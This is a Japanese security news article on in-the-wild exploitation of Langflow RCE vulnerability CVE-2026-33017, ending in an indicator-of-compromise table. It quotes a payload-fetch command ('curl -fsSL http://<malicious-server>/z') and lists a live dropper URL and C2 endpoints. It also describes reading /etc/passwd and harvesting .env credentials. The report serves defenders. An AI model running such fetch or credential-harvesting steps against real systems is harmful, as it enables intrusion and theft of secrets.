Langflow の RCE 脆弱性 CVE-2026-33017:短時間での武器化と Python コード実行

Langflow RCE Flaw Lets Attackers Execute Arbitrary Python Code Without Authentication

2026/06/25 gbhackers — Langflow のリモートコード実行 (RCE) 脆弱性 CVE-2026-33017 が、情報の開示から数時間以内に実環境で積極的に悪用されている。この脆弱性を悪用する攻撃者は、認証を必要とすることなく、公開されているインスタンス上で任意の Python コードを実行できる。この脆弱性が影響を及ぼす範囲は、LLM を活用するパイプラインおよび Retrieval-Augmented Generation (RAG) システムの構築で広く利用されている、オープンソースの AI ワークフロー・フレームワークとなる。これにより、AI 主導の環境における攻撃対象領域が大幅に拡大する。

Langflow の RCE 脆弱性

この欠陥は、認証を必要とせずにフローを構築できる、公開アクセス可能な POST /api/v1/build_public_tmp/{flow_id}/flow エンドポイントに存在する。

入力に対する不適切な検証と、サンドボックス化の欠落を突く攻撃者は、フロー・ノード定義に対して悪意の Python コードを注入できる。このコードはサーバ側で実行されるため、細工された 1 回の HTTP リクエストだけで、完全なコマンド実行の能力が取得されてしまう。

Sysdig の Threat Research Team (TRT) による観測では、2026年3月17日に公開アドバイザリがリリースされてから約 20 時間後に、この脆弱性の悪用が始まっている。

注目すべきことに、攻撃者は公開されている概念実証 (PoC) エクスプロイトに依存せず、アドバイザリに含まれる詳細から、この脆弱性を武器化していた。初期の攻撃においては、Nuclei などの自動スキャン・ツールを介したシステム・コマンド (例:id) などが実行された。続いて、その出力が Base64 でエンコードされ、Interactsh コールバック・ドメインを介して結果を流出させるペイロードが埋め込まれた。

初期の悪用試行は、”77.110.106[.]154″ および “209.97.165[.]247” などの複数の IP アドレスから発信されており、協調したスキャン活動を示唆している。これらの自動プローブは、カスタム Python スクリプトを利用する、より高度な攻撃へと急速に進化した。

脅威アクターは、ディレクトリの一覧取得や、/etc/passwd などの機密ファイルへのアクセス、リモート・シェル・コマンドなどを介して、第 2 段階ペイロードによる偵察を実施した。そこで用いられたのは、curl -fsSL http://<malicious-server>/z のようなコマンドである。

より高度な段階で攻撃者が注力したのは、認証情報の収集および環境の列挙である。venv などのコマンドを実行し、.env ファイルおよびデータベース・ファイルを検索することで、API キー/データベース認証情報/クラウド・アクセス・トークンなどを抽出した。

Langflow インスタンスが、AWS/OpenAI/各種データベースなどの外部サービスと統合されることが多い AI 環境において、上記の機密データにより、ラテラル・ムーブメントやソフトウェア・サプライチェーン侵害が引き起こされる可能性がある。

攻撃インフラでは、重複する指標が明らかになっており、協調したキャンペーンまたは共有ツールの利用が示唆されている。複数の攻撃者が “143.110.183[.]86:8080” にホストされたコマンド&コントロール (C2) サーバに対して、窃取したデータを流出させていた。

それと同時に、第 2 段階のペイロードは “173.212.205[.]251:8443” から配信されていた。複数のトップレベル・ドメインにまたがる、短命の Interactsh ドメインの悪用が示すのは、Out-of-Band (OOB) チャネルを介した、秘匿性の高いデータの流出である。

セキュリティ研究者たちが強調するのは、悪用に至るまでの時間が、わずか数時間へと劇的に短縮されている、この種のインシデントの広範な傾向である。

多くのケースにおける、数日から数週間に及ぶ従来のパッチ適用サイクルでは、もはや十分ではない。ユーザー組織にとって必要なことは、急速に武器化される脅威を緩和するための、ランタイム検出/ネットワーク分離/プロアクティブ監視の導入である。

IoC

Source IPs

IPLocation (Geo)ASN / ProviderObserved Activity
77.110.106.154DE (Frankfurt)AEZA GROUP LLCNuclei scan against Langflow, Interactsh-based callback RCE
209.97.165.247SG (Singapore)DigitalOceanNuclei scan, Interactsh callback test of id command
188.166.209.86SG (Singapore)DigitalOceanNuclei scan, Interactsh callback, identical Python RCE payload
205.237.106.117FR (Paris)PUSHPKT OUNuclei scan with rotated User-Agent strings, Interactsh exfil
83.98.164.238NL (Lelystad)Accenture B.V.Custom exploit script, recon (lscat /etc/passwd), stage-2
173.212.205.251FR (Lauterbourg)Contabo GmbHCustom exploit, env/credential harvesting, dropper hosting

C2 and Staging Infrastructure

IndicatorTypeGeo / ProviderContext
143.110.183.86:8080C2 serverIN, DigitalOceanReceives base64-encoded exfiltrated command output
173.212.205.251:8443Dropper hostFR, Contabo GmbHServes stage-2 payload from path /z

Malicious Dropper URLs

URLRoleNotes
http://143.110.183.86:8080/C2 / exfil endpointReceives HTTP exfil from Python RCE
http://173.212.205.251:8443/zStage-2 dropperBash-executed payload delivery

Interactsh Callback Domains (Samples)

DomainTLDUsage
d6tcpc6flblph01gdcb0ku9ixih393m54.oast.live.oast.liveOOB validation of id command output
d6tcpe7nsv6kk9rdrpggi37zmjfxw9imr.oast.me.oast.meAutomated Nuclei-driven callback
d6td5s9qte0bea7273e0wuou77jjx77uk.oast.pro.oast.proRCE payload result exfiltration
d6tgbe1qte0a8rkffb3gqabqm8517exd3.oast.fun.oast.funEphemeral callback for scanning activity

注:IP アドレスおよびドメインは、意図しない名前解決やハイパーリンク化を防ぐため、意図的に無害化されている (例:[.] )。再度有効化するのは、MISP、VirusTotal、または SIEM など、管理された脅威インテリジェンス・プラットフォーム内に限定すべきである。